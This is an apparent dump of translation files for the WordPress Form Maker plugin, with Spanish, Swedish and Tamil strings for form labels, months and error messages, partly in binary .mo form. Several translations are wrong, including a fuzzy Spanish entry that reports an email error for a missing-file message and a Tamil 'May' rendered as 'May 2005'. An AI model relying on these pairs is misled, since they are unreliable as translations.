#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "Mayo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "Junio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "Julio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "Agosto"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "septiembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "octubre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4199
msgid "November"
msgstr "noviembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4200
msgid "December"
msgstr "Diciembre"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:77
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:92
msgid "Error, incorrect Security code."
msgstr "Error, el código de seguridad incorrecto."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:106
msgid "Your ip is blacklisted. Please contact the website administrator."
msgstr ""
"Su ip es la lista negra. Por favor, póngase en contacto con el administrador "
"del sitio web."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:325
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:854
msgid "The file exceeds the allowed size of"
msgstr "El archivo supera el tamaño permitido de"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:344
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:869
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2520
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4233
msgid "Sorry, you are not allowed to upload this type of file."
msgstr "Lo sentimos, no están autorizados a subir este tipo de archivo."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:365
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:890
msgid "Error, file cannot be moved."
msgstr "Error, el archivo no se puede mover."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:743
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1207
#, php-format
msgid ""
"This field %s requires a unique entry and this value was already submitted."
msgstr ""
"Este campo %s requiere de una entrada única y este valor ya se había "
"presentado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:895
#, fuzzy
msgid "Error, file destination does not exist."
msgstr "Error, el correo electrónico no fue enviado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:1434
msgid "Nothing was submitted."
msgstr "Nada se presentó."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2343
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2356
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4047
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4052
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:64
msgid "Your form was successfully submitted."
msgstr "El formulario se ha enviado correctamente."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:2351
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelForm_maker.php:4043
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:61
msgid "Error, email was not sent."
msgstr "Error, el correo electrónico no fue enviado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:27
msgid "Your email address is already verified."
msgstr "Su dirección de correo electrónico ya está verificada."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:68
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:94
msgid "Your email has been successfully verified."
msgstr "Su correo electrónico se ha verificado correctamente."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:71
msgid "Your email verification has timed out."
msgstr "Tu dirección de correo electrónico de verificación ha caducado."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/models/FMModelVerify_email.php:99
msgid "Verification link is invalid."
msgstr "Enlace de verificación no es válido."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1034
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1085
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1156
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1203
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1307
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1379
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1484
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1499
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1673
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1855
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2022
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2155
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2290
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2340
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2457
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2560
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2728
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2918
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3088
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3245
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3386
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3487
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3546
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3601
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3661
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3718
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3778
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3892
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3906
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3921
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3936
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4238
msgid "field is required."
msgstr "campo es obligatorio."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:1690
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4236
msgid "This is not a valid email address."
msgstr "Esto no es una dirección válida de email"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2356
msgid ""
"You cannot select former dates. Choose a date starting from the current one."
msgstr ""
"No es posible seleccionar las fechas anteriores. Elija una fecha a partir de "
"la actual."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "The"
msgstr "la "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2767
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4239
msgid "value must be between"
msgstr "valor debe estar entre "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2893
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2933
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3064
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3101
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3220
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3261
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4212
msgid "Quantity"
msgstr "Cantidad "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:3792
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4001
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4002
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4234
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4235
msgid "Your score should be less than"
msgstr "Su puntaje debe ser inferior a "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4185
msgid "Title"
msgstr "Cargo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4186
msgid "First"
msgstr "PRIMER"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4187
msgid "Last"
msgstr "Última"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4188
msgid "Middle"
msgstr "Medio"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4207
msgid "Area Code"
msgstr "codigo de área"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4208
msgid "Phone Number"
msgstr "Teléfono"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4209
msgid "Dollars"
msgstr "Dólares "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4210
msgid "Cents"
msgstr "Cents "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4213
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:300
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:586
msgid "From"
msgstr "desde "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4214
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:305
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:588
msgid "To"
msgstr "a"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:29
msgid "You have no permission to view submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:143
msgid "Entries"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:145
msgid "Views"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:147
msgid "Conversion Rate"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:150
msgid "Export to"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:166
msgid "GO"
msgstr "ir "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:167
msgid "Reset"
msgstr "Restablecer "

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid "of"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:170
msgid ""
"submissions are not shown, as the field you sorted by is missing in those "
"submissions."
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:357
msgid "Canceled"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:358
msgid "Cleared"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:359
msgid "Cleared by payment review"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:360
msgid "Completed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:361
msgid "Denied"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:362
msgid "Failed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:363
msgid "Held"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:364
msgid "In progress"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:365
msgid "On hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:366
msgid "Paid"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:367
msgid "Partially refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:368
msgid "Pending verification"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:369
msgid "Placed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:370
msgid "Processing"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:371
msgid "Refunded"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:372
msgid "Refused"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:373
msgid "Removed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:374
msgid "Returned"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:375
msgid "Reversed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:376
msgid "Temporary hold"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:377
msgid "Unclaimed"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:472
msgid "Show on Map"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:505
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:754
msgid "Total"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:510
msgid "Show Matrix"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:560
msgid "Statistics"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:564
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:568
msgid "Select a Field"
msgstr "Seleccione un campo"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:583
msgid "Select a Date"
msgstr "Seleccione una fecha"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:594
msgid "Show"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:626
msgid "Please select the field!"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:723
msgid "Choices"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:724
msgid "Percentage"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:725
msgid "Count"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:747
msgid "Unanswered"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:771
msgid "Address"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:779
msgid "Longitude"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_submissions.php:787
msgid "Latitude"
msgstr ""
languages/form_maker-sv_SE.mo000060400000007171152434416630012220 0ustar00��5�Gl��	����������%+03;@EJPT[r{����
��	�7�*9O$SKx"����L'[*�&�%�A�=\o��A

G
R
Z
_
c
h
q
x
�
�
�
�
�
�
�
B�
16=BFMen
v�����	�1�(;.?Bn&��� �O
-X
�
#�
�
<�
 !B]4%
$#,	5'2 -
10+/&!*.")3(AprilArea CodeAugustCentsCityCountryDecemberDollarsError, email was not sent.Error, file cannot be moved.Error, incorrect Security code.FebruaryFirstFromGOJanuaryJulyJuneLastMarchMayMiddleNothing was submitted.NovemberOctoberPhone NumberPostal / Zip CodeQuantityResetSelect a DateSelect a FieldSeptemberSorry, you are not allowed to upload this type of file.State / Province / RegionStreet AddressStreet Address Line 2TheThe file exceeds the allowed size ofThis field %s requires a unique entry and this value was already submitted.This is not a valid email address.TitleToVerification link is invalid.You cannot select former dates. Choose a date starting from the current one.Your email address is already verified.Your email has been successfully verified.Your email verification has timed out.Your form was successfully submitted.Your ip is blacklisted. Please contact the website administrator.Your score should be less thanfield is required.value must be betweenProject-Id-Version: form_maker
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2015-05-22 17:04+0400
PO-Revision-Date: 2015-05-22 17:04+0400
Last-Translator: 
Language-Team: 
Language: sv
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Poedit-KeywordsList: _;gettext;gettext_noop;__
X-Poedit-Basepath: .
X-Generator: Poedit 1.7.6
X-Poedit-SearchPath-0: C:\wamp\www\wordpress\wp-content\plugins\form-maker
AprilRiktnummeraugustiCentOrtLandDecemberDollarFel, var e-post inte skickas.Fel, kan filen inte flyttas.Fel, fel säkerhetskod.FebruariFörstFrångå JanuariJuli!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!JuniSenastMarsMajmellanIngenting lämnades in.NovemberOktoberTelefonnummerPost / PostnummerMängdÅterställ Välj ett datumVälj ett fältvSeptemberTyvärr, du får inte ladda upp denna typ av fil.Stat / Provins / RegionGatunamnGatuadress Linje 2DenFilen överskrider den tillåtna storleken påDetta fält %s kräver ett unikt inresa och detta värde redan in.Detta är inte en giltig e-postadress.TitelFör attVerifieringslänken är ogiltig.Du kan inte välja tidigare datum. Välj ett datum från och med den nuvarande.Din e-postadress som redan har kontrollerats.Ditt mail har verifierats.Din e-postverifiering har gått ut.Formuläret framgångsrikt in.Din ip är svartlistad. Kontakta webbplatsens administratörDin poäng bör vara mindre än fältet är obligatoriskt.Värdet måste vara mellan languages/form_maker-ta.po000060400000063123152434416630011607 0ustar00msgid ""
msgstr ""
"Project-Id-Version: form_maker\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2015-05-22 17:05+0400\n"
"PO-Revision-Date: 2015-05-22 17:05+0400\n"
"Last-Translator: \n"
"Language-Team: \n"
"Language: ta\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: 8bit\n"
"X-Poedit-KeywordsList: _;gettext;gettext_noop;__\n"
"X-Poedit-Basepath: .\n"
"X-Generator: Poedit 1.7.6\n"
"X-Poedit-SearchPath-0: C:\\wamp\\www\\wordpress\\wp-content\\plugins\\form-"
"maker\n"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:240
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4201
msgid "Street Address"
msgstr "தெரு முகவரி"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:243
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4202
msgid "Street Address Line 2"
msgstr "தெரு முகவரி வரி 2"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:246
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4203
msgid "City"
msgstr "நகரம்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:249
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4204
msgid "State / Province / Region"
msgstr "மாநிலம் / மாகாணம் / பிராந்தியம்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:252
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4205
msgid "Postal / Zip Code"
msgstr "தபால் / ஜிப் குறியீடு"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/models/FMModelSubmissions_fm.php:255
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4206
msgid "Country"
msgstr "நாடு"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:104
msgid "Connection type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSelect_data_from_db.php:140
msgid "Type"
msgstr ""

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4189
msgid "January"
msgstr "ஜனவரி"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4190
msgid "February"
msgstr "பிப்ரவரி"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4191
msgid "March"
msgstr "மார்ச்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4192
msgid "April"
msgstr "ஏப்ரல்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4193
msgid "May"
msgstr "மே 2005."

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4194
msgid "June"
msgstr "ஜூன்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4195
msgid "July"
msgstr "ஜூலை"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4196
msgid "August"
msgstr "ஆகஸ்ட்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4197
msgid "September"
msgstr "செப்டெம்பர்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:4198
msgid "October"
msgstr "அக்டோபர்"

#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/admin/views/FMViewSubmissions_fm.php:2530
#: C:\wamp\www\wordpress\wp-content\plugins\form-maker/frontend/views/FMViewForm_maker.php:2419
